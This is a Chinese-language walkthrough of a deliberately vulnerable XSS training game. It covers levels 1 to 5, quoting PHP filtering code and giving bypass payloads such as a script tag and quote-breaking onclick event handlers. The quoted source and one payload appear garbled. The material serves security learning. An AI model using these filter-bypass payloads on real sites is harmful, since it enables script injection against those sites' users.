XSS闯关小游戏(level1~13)
level1
-
源代码
欢迎用户".$str.""; ?>通过源代码发现此关没有对输入的name值做任何过滤,直接echo出来
-
寻找输入点和输出点

-
构造payload
<script>alert(1)script>
level2
-
源代码
没有找到和".htmlspecialchars($str)."相关的结果.".' '; ?>
此关使用了
htmlspecialchars()函数---->把html标签转化为浏览器不能识别的字符,利用这个函数转化以后,html标签就可以在浏览器原样输出了。 -
输入输出点

-
构建payload
1" οnclick="alert(1)
level3
-
查看页面源代码
没有找到和".htmlspecialchars($str)."相关的结果."." "; ?>可以发现在
和处都使用了htmlspecialchars()函数 -
输入输出点

-
构建payload
1' οnclick='alert(1)
level4
-
查看页面源代码
","",$str); $str3=str_replace("<","",$str2); echo "没有找到和".htmlspecialchars($str)."相关的结果.
".' '; ?>此关使用
str_replace()对用户输入进行了过滤,将<、>替换成空 -
输入输出点

-
构建payload
1" οnclick="alert(1)
level5
-
查看源代码
没有找到和".htmlspecialchars($str)."相关的结果.".' '; ?>此关使用
str_replace()对用户输入进行了过滤,将
